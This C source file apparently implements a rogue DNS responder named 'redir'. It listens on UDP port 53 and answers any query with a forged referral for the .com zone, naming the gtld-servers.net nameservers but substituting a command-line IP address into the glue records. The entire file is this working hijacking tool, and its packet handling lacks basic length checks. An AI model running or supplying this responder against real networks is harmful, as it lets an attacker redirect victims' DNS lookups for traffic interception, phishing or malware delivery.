#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <string.h>

unsigned char pattern[] = {
    0x03,0x63,0x6f,0x6d,
    0x00,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x14,0x01,0x6c,0x0c,0x67,0x74,
    0x6c,0x64,0x2d,0x73,0x65,0x72,0x76,0x65,
    0x72,0x73,0x03,0x6e,0x65,0x74,0x00,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x66,0xc0,0x2d,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x6d,0xc0,0x2d,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x65,0xc0,0x2d,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x62,0xc0,0x2d,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x68,0xc0,0x2d,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x67,0xc0,0x2d,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x63,0xc0,0x2d,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x6b,0xc0,0x2d,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x69,0xc0,0x2d,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x61,0xc0,0x2d,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x64,0xc0,0x2d,0xc0,
    0x1c,0x00,0x02,0x00,0x01,0x00,0x00,0x4e,
    0xad,0x00,0x04,0x01,0x6a,0xc0,0x2d,0xc0,
    0x2b,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0xbc,0xdc,0xec,0xc0,
    0x4b,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x23,0x33,0x1e,0xc0,
    0x5b,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x37,0x53,0x1e,0xc0,
    0x6b,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x0c,0x5e,0x1e,0xc0,
    0x7b,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x21,0x0e,0x1e,0xc0,
    0x8b,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x36,0x70,0x1e,0xc0,
    0x9b,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x2a,0x5d,0x1e,0xc0,
    0xab,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x1a,0x5c,0x1e,0xc0,
    0xbb,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x34,0xb2,0x1e,0xc0,
    0xcb,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x2b,0xac,0x1e,0xc0,
    0xdb,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x05,0x06,0x1e,0xc0,
    0xeb,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x1f,0x50,0x1e,0xc0,
    0xfb,0x00,0x01,0x00,0x01,0x00,0x01,0x05,
    0xd8,0x00,0x04,0xac,0x30,0x4f,0x1e,
};

void adjust(unsigned char *buff, int off, int len, struct sockaddr_in *srv)
{
    int i;
    //printf("off is %d,len %d\n", off, len);
    
    for (i = 0; i < len; i++)
    {
        if (buff[i] == 0xC0)
        {
            unsigned short dummy;
            dummy = ((( buff[i] & 0x3f) << 8) | (buff[i+1]));
            //printf("[%2x][%2x]dummy: %d ->",buff[i], buff[i+1], dummy);

            dummy = dummy - 0x1C + off;
            //printf("%d\n", dummy);
            buff[i] = (dummy >> 8) | 0xC0;
            buff[i+1] = dummy & 0xFF;
        }
        if ((i < len - 4)
            && (buff[i] == 0xac) && (buff[i+1] == 0xbc)
            && (buff[i+2] == 0xdc) && (buff[i+3] == 0xec))
            memcpy(buff + i, &srv->sin_addr.s_addr, 4);
    }
    
}


int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in name;
    struct sockaddr_in srv;
    
    int opt = 1;

    if (argc != 2)
    {
        printf("redir ip_address\n");
        exit(-1);
    }
    
    if (!inet_aton(argv[1], &srv.sin_addr))
    {
        printf("Invalid IP address %s\n", argv[1]);
        exit(-1);
    }
    

    sock = socket(PF_INET, SOCK_DGRAM, 0);
    if (sock < 0)
    {
        printf("fail to open socket\n");
        exit(-1);
    }
    setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)); 
    name.sin_family = AF_INET;
    name.sin_port = htons(53);
    name.sin_addr.s_addr = htonl(INADDR_ANY);
    
    if (bind(sock, (struct sockaddr *)&name, sizeof(name)) < 0)
    {
        printf("fail to bind\n");
        shutdown(sock, 0);
        exit(-1);
    }
    while (1)
    {
        struct sockaddr_in from_addr;
        socklen_t addr_len;
        int len;
        unsigned char msg[1500];
        unsigned char reply[1500];
        int off;
        int rc;
        
        printf("listen udp packets\n");
        
        addr_len = sizeof(struct sockaddr_in);
        len = recvfrom(sock, msg, sizeof(msg), 0,
                       (struct sockaddr *)&from_addr, &addr_len);
        printf("received a query %d bytes\n", len);
        reply[0] = msg[0];
        reply[1] = msg[1];
        reply[2] = 0x80;
        reply[3] = 0x80;
        reply[4] = 0x00;
        reply[5] = 0x01;
        reply[6] = 0x00;
        reply[7] = 0x00;
        reply[8] = 0x00;
        reply[9] = 0x0d;
        reply[10] = 0x00;
        reply[11] = 0x0d;
        memcpy(reply + 12, msg + 12, len - 12);
        off = len;
        memcpy(reply + off, pattern, sizeof(pattern));
        adjust(reply + off, off, sizeof(pattern), &srv);
        rc = sendto(sock, reply, off + sizeof(pattern), 0,
		(const struct sockaddr *) &from_addr,
               sizeof(struct sockaddr_in));
        if (rc != (off + sizeof(pattern))) 
        {
            printf("sendto error: %s: %s",
		inet_ntoa(from_addr.sin_addr), strerror(errno));
            return (rc);
        }

    }
    exit(0);
    
}

